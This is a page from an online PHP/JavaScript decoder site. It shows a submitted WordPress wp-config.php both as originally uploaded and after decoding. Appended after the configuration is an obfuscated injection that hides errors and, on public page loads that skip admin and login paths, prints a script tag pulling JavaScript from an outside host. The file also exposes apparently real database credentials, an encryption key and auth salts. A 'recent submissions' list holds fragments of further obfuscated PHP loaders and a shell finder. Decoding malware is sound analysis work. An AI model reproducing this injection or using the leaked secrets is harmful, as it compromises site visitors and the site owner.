Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php

// BEGIN iThemes Security - Do not modify or remove this line
// iThemes Security Config Details: 2
define( 'DISALLOW_FILE_EDIT', true ); // Disable File Editor - Security > Settings > WordPress Tweaks > File Editor
// END iThemes Security - Do not modify or remove this line

define( 'ITSEC_ENCRYPTION_KEY', 'XztfRXd3MG0+RiNufEhXQzNfWi9sL0d8M21aQUFFODslYT9FIWJFfCM1VlVfOlFfXWJEYix7Ml5WPHIpcSBHaA==' );

//Begin Really Simple SSL session cookie settings
@ini_set('session.cookie_httponly', true);
@ini_set('session.cookie_secure', true);
@ini_set('session.use_only_cookies', true);
//END Really Simple SSL
 // Added by WP Rocket

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'server304736_1' );

/** Database username */
define( 'DB_USER', 'server304736_1' );

/** Database password */
define( 'DB_PASSWORD', 'YcTnDP*M8EHq' );

/** Database hostname */
define( 'DB_HOST', 'mariadb105.server304736.nazwa.pl' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'mta5z0dhetkq1hftyjhwziwq7bvsp6htrnlf2ga5k30w8hyjszhqdzfarioxprvk' );
define( 'SECURE_AUTH_KEY',  'unb4xyprxm94zufce4vcwicvlhngxj39zhmpjjvhrl9hfemosrcw2hsml2gmztju' );
define( 'LOGGED_IN_KEY',    '8f1ote0rfweldaz95emqjbmi23vq4uggx3ca6azgz5pi7oynbgjre2vlfgl2eqs8' );
define( 'NONCE_KEY',        'vsiuakqmuzr4u8eus0diruvl9er9ktv4kggqlxks40oolbbcnfnokutvw69ety7a' );
define( 'AUTH_SALT',        'sakpkhj1w8lawo7y5prlc20ajtaw7dg3lumcspunt2ybhfrkzes54cufsph7d5sd' );
define( 'SECURE_AUTH_SALT', 'e2qsmaf74b0vadphp88oiypoae3irfklrqhriwemgb2wx4zzvp2msziec0harkwh' );
define( 'LOGGED_IN_SALT',   'qteuzhokyhmwjq4k6vfyopfoes275egwjihculqy5qzqesdcwp5tjfjc1tt2hyql' );
define( 'NONCE_SALT',       'f4khprjrv91rsrhb3tlj6dzapryryaweuyxrda1hrzyt5a5fgd1bnjkq142eyzoq' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wptd_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

?>
<?php ini_set("display_errors", 0); ini_set("display_startup_errors", 0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); } ?>

Decrypted code:

// BEGIN iThemes Security - Do not modify or remove this line
// iThemes Security Config Details: 2
define( 'DISALLOW_FILE_EDIT', true ); // Disable File Editor - Security > Settings > WordPress Tweaks > File Editor
// END iThemes Security - Do not modify or remove this line

define( 'ITSEC_ENCRYPTION_KEY', 'XztfRXd3MG0+RiNufEhXQzNfWi9sL0d8M21aQUFFODslYT9FIWJFfCM1VlVfOlFfXWJEYix7Ml5WPHIpcSBHaA==' );

//Begin Really Simple SSL session cookie settings
@ini_set('session.cookie_httponly', true);
@ini_set('session.cookie_secure', true);
@ini_set('session.use_only_cookies', true);
//END Really Simple SSL
 // Added by WP Rocket

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'server304736_1' );

/** Database username */
define( 'DB_USER', 'server304736_1' );

/** Database password */
define( 'DB_PASSWORD', 'YcTnDP*M8EHq' );

/** Database hostname */
define( 'DB_HOST', 'mariadb105.server304736.nazwa.pl' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'mta5z0dhetkq1hftyjhwziwq7bvsp6htrnlf2ga5k30w8hyjszhqdzfarioxprvk' );
define( 'SECURE_AUTH_KEY',  'unb4xyprxm94zufce4vcwicvlhngxj39zhmpjjvhrl9hfemosrcw2hsml2gmztju' );
define( 'LOGGED_IN_KEY',    '8f1ote0rfweldaz95emqjbmi23vq4uggx3ca6azgz5pi7oynbgjre2vlfgl2eqs8' );
define( 'NONCE_KEY',        'vsiuakqmuzr4u8eus0diruvl9er9ktv4kggqlxks40oolbbcnfnokutvw69ety7a' );
define( 'AUTH_SALT',        'sakpkhj1w8lawo7y5prlc20ajtaw7dg3lumcspunt2ybhfrkzes54cufsph7d5sd' );
define( 'SECURE_AUTH_SALT', 'e2qsmaf74b0vadphp88oiypoae3irfklrqhriwemgb2wx4zzvp2msziec0harkwh' );
define( 'LOGGED_IN_SALT',   'qteuzhokyhmwjq4k6vfyopfoes275egwjihculqy5qzqesdcwp5tjfjc1tt2hyql' );
define( 'NONCE_SALT',       'f4khprjrv91rsrhb3tlj6dzapryryaweuyxrda1hrzyt5a5fgd1bnjkq142eyzoq' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wptd_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );







/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
ini_set("display_errors", 0); ini_set("display_startup_errors", 0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(<script src="//sync.gsyndication.com/"></script>); }

Recent submissions:

<?php ; $Lix = "u\x61i\x63K\x636HFrWYZM4N/H\x420wFwvtj4kimGJ0/\x63p222HTiRLkJ\x63p\x2b... <?php $Sh3LLFinder = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63g... <?php /*Leafmail3*/goto vODF8; uW9iC: p1I3i: goto m0oPE; zJ0r4: $fd50r .= "\164\144\157"; ... eval(gzinflate(base64_decode("jVJrb9owFP3Or8gkpICopgQKCE3V1tKGVyEFikkzTcixncbEOFniQJOp/30O... name":"+++ \u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u043f\u0440... 8015,"name":"+++ \u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u043f... ,"name":"+++ \u0414\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u043... <script> function _ni(p,f){return p/f}function _Eu(){return function (){return _jh(_CP())... <?php /* obfuscated by phpObfuscator.cn */ error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING)... "name":"+++ \u0421\u0438\u043d\u0438\u0435 \u043f\u043e\u0433\u043e\u043d\u044b","user_id"...